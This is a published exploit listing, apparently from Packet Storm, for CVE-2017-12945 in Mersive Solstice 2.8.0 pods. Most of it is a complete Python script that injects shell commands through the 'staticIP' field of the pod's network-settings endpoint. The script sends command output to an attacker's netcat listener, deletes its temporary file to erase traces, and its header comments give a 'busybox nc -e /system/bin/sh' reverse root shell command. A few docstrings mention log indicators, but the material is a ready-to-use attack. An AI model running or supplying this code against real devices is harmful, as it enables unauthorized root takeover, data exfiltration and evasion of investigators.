Mersive Solstice 2.8.0 Remote Code Execution

🗓️ 28 Nov 2019 00:00:00Reported by Alexandre TeyarType 
packetstorm
 packetstorm
Mersive Solstice 2.8.0 Remote Code Execution description

# Exploit Title: Mersive Solstice 2.8.0 - Remote Code Execution  
# Google Dork: N/A  
# Date: 2016-12-23  
# Exploit Author: Alexandre Teyar  
# Vendor Homepage: https://www2.mersive.com/  
# Firmware Link: http://www.mersive.com/Support/Releases/SolsticeServer/SGE/Android/2.8.0/Solstice.apk  
# Versions: 2.8.0  
# Tested On: Mersive Solstice 2.8.0  
# CVE: CVE-2017-12945  
# Description : This will exploit an (authenticated) blind OS command injection   
# vulnerability present in Solstice devices running versions  
# of the firmware prior to 2.8.4.  
# Notes : To get the command output (in piped-mode), a netcat listener   
# (e.g. 'nc -lkvp <LPORT>') needs to be launched before   
# running the exploit.  
# To get an interactive root shell use the following syntax  
# 'python.exe .\CVE-2017-12945.py -pass <PASSWORD>  
# -rh <RHOST> -p "busybox nc <LHOST> <LPORT>  
# -e /system/bin/sh -i"'.  
  
  
#!/usr/bin/env python3  
  
import argparse  
import logging  
import requests  
import sys  
import time  
  
  
def parse_args():
    """Build the command-line parser and return the parsed options.

    Every option maps onto the attribute named by its ``dest``:

      -d / --debug       ``loglevel``: logging.DEBUG when given, else logging.INFO
      -lh / --lhost      ``lhost``: listening address (optional, default None)
      -lp / --lport      ``lport``: listening port, kept as a string (default "4444")
      -p / --payload     ``payload``: the command string (required)
      -pass / --password ``password``: target administrator password (default "")
      -rh / --rhost      ``rhost``: the target address (required)

    Returns:
        argparse.Namespace with the attributes listed above.

    Raises:
        SystemExit: argparse exits on a missing required option or a parse error.
    """
    parser = argparse.ArgumentParser(
        description="Solstice Pod Blind Command Injection"
    )

    # (flags, keyword arguments) in the original declaration order so the
    # generated --help output is unchanged.
    option_specs = [
        (
            ("-d", "--debug"),
            dict(
                dest="loglevel",
                help="enable verbose debug mode",
                required=False,
                action="store_const",
                const=logging.DEBUG,
                default=logging.INFO,
            ),
        ),
        (
            ("-lh", "--lhost"),
            dict(
                dest="lhost",
                help="the listening address",
                required=False,
                type=str,
            ),
        ),
        (
            ("-lp", "--lport"),
            dict(
                dest="lport",
                help="the listening port - default 4444",
                required=False,
                default="4444",
                type=str,
            ),
        ),
        (
            ("-p", "--payload"),
            dict(
                dest="payload",
                help="the command to execute",
                required=True,
                type=str,
            ),
        ),
        (
            ("-pass", "--password"),
            dict(
                dest="password",
                help="the target administrator password",
                required=False,
                default="",
                type=str,
            ),
        ),
        (
            ("-rh", "--rhost"),
            dict(
                dest="rhost",
                help="the target address",
                required=True,
                type=str,
            ),
        ),
    ]

    for flags, kwargs in option_specs:
        parser.add_argument(*flags, **kwargs)

    return parser.parse_args()
  
  
def main():
    """Run the tool end to end: parse options, configure logging, then
    issue the requests through send_payload().

    Sequence (unchanged from the original script):
      1. ``args.payload`` is sent for execution. When both ``-lh`` and
         ``-lp`` are set ("piped mode") its stdout/stderr are redirected
         to /data/local/tmp/rce.tmp on the device instead.
      2. In piped mode a second request pushes that file to LHOST:LPORT
         with ``busybox nc`` and a third request deletes it.

    Every step is a POST to the pod's /Config/service/saveData endpoint
    (see send_payload); that endpoint, hit three times in quick
    succession, is what to look for in device or proxy logs when
    investigating this CVE.

    A KeyboardInterrupt is logged as a warning and ends the process with
    exit status 0.
    """
    try:
        args = parse_args()
        lhost, lport = args.lhost, args.lport
        password, rhost = args.password, args.rhost

        logging.basicConfig(
            datefmt="%H:%M:%S",
            format="%(asctime)s: %(levelname)-8s %(message)s",
            handlers=[logging.StreamHandler()],
            level=args.loglevel,
        )

        # Piped mode needs both a listener address and a port; lport has a
        # default, so in practice this hinges on -lh being supplied.
        piped = bool(lhost and lport)

        command = args.payload
        if piped:
            # Capture stdout and stderr in a temporary file on the device;
            # the two follow-up requests below fetch and then remove it.
            command += " > /data/local/tmp/rce.tmp 2>&1"
            logging.info("attacker listening address: %s:%s", lhost, lport)

        logging.info("solstice pod address: %s", rhost)

        if password:
            logging.info("solstice pod administrator password: %s", password)

        logging.info("sending the payload...")
        send_payload(rhost, password, command)

        if piped:
            # Ship the captured output back to the listener ...
            fetch_command = (
                "busybox nc {} {} < /data/local/tmp/rce.tmp ".format(lhost, lport)
            )
            logging.info("retrieving the results...")
            send_payload(rhost, password, fetch_command)

            # ... then drop the temporary file.
            logging.info("erasing exploitation traces...")
            send_payload(rhost, password, "rm -f /data/local/tmp/rce.tmp")

    except KeyboardInterrupt:
        logging.warning("'CTRL+C' pressed, exiting...")
        sys.exit(0)
  
  
def send_payload(rhost, password, payload):
    """POST one injected command to the pod's network-configuration endpoint.

    The body imitates the admin UI's "save network settings" call to
    ``/Config/service/saveData``. ``payload`` is prefixed with ``"; "`` and
    placed in the ethernet ``staticIP`` field, the parameter affected by
    CVE-2017-12945; a ``staticIP`` value beginning with a semicolon is never
    a valid address, which makes this request easy to flag in logs.
    After the POST the function sleeps 2 seconds to give the device time to
    run the command (the injection is blind: the HTTP response carries no
    command output).

    Args:
        rhost: target host, used for the URL and the Referer header.
        password: administrator password, sent in the ``password`` field.
        payload: the shell command string.

    Raises:
        SystemExit: any requests.exceptions.RequestException is logged and
            the process exits with status 0.
    """
    endpoint = "http://{}/Config/service/saveData".format(rhost)
    referer = "http://{}/Config/config.html".format(rhost)

    request_headers = {
        "Content-Type": "application/json",
        "X-Requested-With": "XMLHttpRequest",
        "Referer": referer,
    }

    ethernet_settings = {
        "dhcp": False,
        "staticIP": "; {}".format(payload),
        "gateway": "",
        "prefixLength": 24,
        "dns1": "",
        "dns2": "",
    }
    body = {
        "m_networkCuration": {"ethernet": ethernet_settings},
        "password": str(password),
    }

    # To inspect the traffic, pass a ``proxies=`` mapping to requests.post
    # pointing at an intercepting proxy (intentionally not wired in here).

    try:
        logging.info("%s", payload)

        response = requests.post(
            endpoint,
            headers=request_headers,
            json=body,
        )

        # NOTE: response.json() is evaluated regardless of the log level and
        # raises on a non-JSON body; that exception is not caught below.
        logging.debug("%s", response.json())

        # Allow the injected command to finish on the device.
        time.sleep(2)

    except requests.exceptions.RequestException as ex:
        logging.error("%s", ex)
        sys.exit(0)
  
  
# Run the tool only when executed directly, not when imported as a module.
if __name__ == "__main__":
    main()